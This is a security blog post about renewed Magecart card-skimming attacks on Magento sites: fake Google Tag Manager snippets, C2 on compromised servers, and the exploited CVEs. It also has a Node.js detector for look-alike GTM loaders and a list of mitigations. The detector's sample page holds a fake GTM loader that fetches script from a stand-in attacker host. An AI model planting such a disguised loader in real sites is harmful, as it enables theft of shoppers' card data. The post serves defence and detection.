Kevin Mckywer

Magecart attacks (so named because they mostly targeted Magento-based ecommerce environments) exploded in 2015, infecting thousands of web sites in one of the biggest campaigns in the history of ecommerce attacks. Back then, Magecart attacks leveraged vulnerabilities within Magento, most notably the Shoplift bug addressed by patch SUPEE-5344, as previously noted by Foregenix. In its most basic form, once access to a site was gained, the threat actors injected malicious code into the site's JavaScript that acted as a skimmer, capturing cardholder data and customers' personal information as it was entered during checkout. The captured data was then base64 encoded (or in some cases left as plain text) and exfiltrated to remote systems on the internet controlled by the attackers.

 

Between 2015 and 2022 the number of Magecart victims grew rapidly. Throughout that period Foregenix was at the heart of incident response and investigation work, helping medium and large merchants to quickly contain and eradicate reported breaches.

 

Now, in 2023, Foregenix is seeing something of a resurgence in Magecart attacks, with attackers employing more creative techniques to avoid detection. In recent Foregenix investigations the attack typically begins with the compromise of other internet-facing servers, which the attackers then use as command and control (C2) infrastructure to host their malicious code. They then exploit vulnerabilities in unpatched Magento sites, such as CVE-2022-24086 and CVE-2022-24087, the improper input validation flaws in Magento Open Source and Adobe Commerce patched in February 2022 that allow pre-authentication remote code execution. Attacks vary, but some recently compromised sites were injected with malicious JavaScript disguised as a Google Tag Manager (GTM) container snippet. The fake snippet loads further malware, a fake payment (checkout) page, from the previously compromised legitimate site acting as a C2 server, and the cardholder data entered into it is harvested and exfiltrated to the attackers' servers. In short, rudimentary Magecart techniques are being combined with modern attack methods to compromise sites and evade detection more effectively: to an unsuspecting administrator, the fake GTM snippet looks like a legitimate piece of tag manager code on their site.
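As an added illustration of the fake-GTM technique described above (this is example code, not code from Foregenix or from any of its investigations), the following Node.js script scans page markup for Google Tag Manager loader snippets and flags any whose gtm.js URL does not resolve to Google's tag manager host. The sample HTML, the attacker host gtm-cdn.example and the container ID GTM-XXXXXX are constructed placeholders. Real skimmer loaders are often obfuscated, so a snippet that carries the GTM markers but whose URL cannot be recovered is reported for review rather than passed.

```javascript
// Added example (not Foregenix code): spot <script> blocks that imitate the
// Google Tag Manager loader but pull gtm.js from somewhere other than Google.
// Only the well-known GTM hosts are treated as legitimate.
const GTM_HOSTS = new Set(["www.googletagmanager.com", "googletagmanager.com"]);

// Constructed sample <head>: a genuine GTM snippet, a look-alike whose loader
// URL points at an attacker-controlled host (hypothetical domain), and an
// ordinary first-party script that should not be flagged at all.
const SAMPLE_HTML = `<head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXX');</script>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://gtm-cdn.example/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXXXX');</script>
<script src="/static/frontend/checkout.js"></script>
</head>`;

// Pull every <script> out of the markup: its src attribute (if any) and body.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Identify GTM-style loaders and resolve where they really fetch gtm.js from.
// A snippet that carries the GTM markers but hides its URL (string-built or
// obfuscated) is reported with host null so it gets reviewed, not ignored.
function findGtmLoaders(html) {
  const findings = [];
  for (const { src, body } of extractScripts(html)) {
    const looksLikeGtm =
      /gtm\.start|gtm\.js|dataLayer/.test(body) || /gtm\.js/.test(src || "");
    if (!looksLikeGtm) continue;
    const urlMatch =
      /https?:\/\/[^'"\s)]*?gtm\.js/.exec(body) ||
      /https?:\/\/[^'"\s]*?gtm\.js/.exec(src || "");
    let host = null;
    if (urlMatch) {
      try { host = new URL(urlMatch[0]).hostname; } catch { host = null; }
    }
    findings.push({ host, legitimate: host !== null && GTM_HOSTS.has(host) });
  }
  return findings;
}

// Everything that is not provably the real GTM loader.
const suspiciousGtmLoaders = (html) =>
  findGtmLoaders(html).filter((f) => !f.legitimate);

console.log(JSON.stringify(findGtmLoaders(SAMPLE_HTML), null, 2));
```

Run against the constructed page, the genuine snippet resolves to www.googletagmanager.com and is marked legitimate, the look-alike resolves to gtm-cdn.example and is not, and the first-party checkout.js is not treated as a tag manager loader at all. In practice the same check belongs in the regular JavaScript audit of every page that renders the checkout.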

 

Prevention is the best way to stay ahead of the threat of a breach. The following measures mitigate these attacks:

 

  • Watch for software updates and security patches for every product your site uses, and apply them promptly (the fewer technologies you run, the easier patch management is). Put a patch management policy in place and adhere to it: a strong patch management procedure ensures known vulnerabilities, such as the Magento CVEs above, are fixed quickly, shrinking the attack surface available to threat actors.

  • Take an inventory of all JavaScript served by the site, first-party and third-party, including tag manager snippets, and audit it regularly to confirm nothing has been altered or injected with malicious code.

  • Deploy a File Integrity Monitor (FIM). Its importance cannot be overemphasised: it ensures unauthorised file modifications are promptly detected and alerted on, so they can be responded to and the breach contained.

  • Review passwords regularly and rotate them, ideally at least every ninety (90) days, and immediately whenever a compromise is suspected.

  • Implement HTTP Content-Security-Policy headers. A restrictive script-src limits where scripts may be loaded from, connect-src and form-action limit where harvested data can be sent, and frame-ancestors defends against clickjacking; together these add a layer of defence against injected skimmers and other XSS.

 

Foregenix provides cutting-edge software capable of detecting and alerting on attacks as they happen. With more than 100 years of combined experience across its team of cyber security experts, attacks are quickly responded to and contained, ensuring the least disruption to business and revenue generation.

 

In many recent investigations Foregenix has identified breaches closely resembling the Magecart attacks of many years ago. While the techniques now employed are based on previously observed patterns, they have been modernised. The target remains the same: cardholder data and customers' personal information, intercepted from ecommerce transactions through web (digital) skimming or form jacking.


Kevin Mckywer

Kevin is an ardent cyber security enthusiast with a passion for incident response, digital forensics and information security in general. With more than a decade of experience across different industries, he has been involved in the delivery of numerous medium to large-scale complex projects. He also has a particular interest in malware research and threat intelligence.
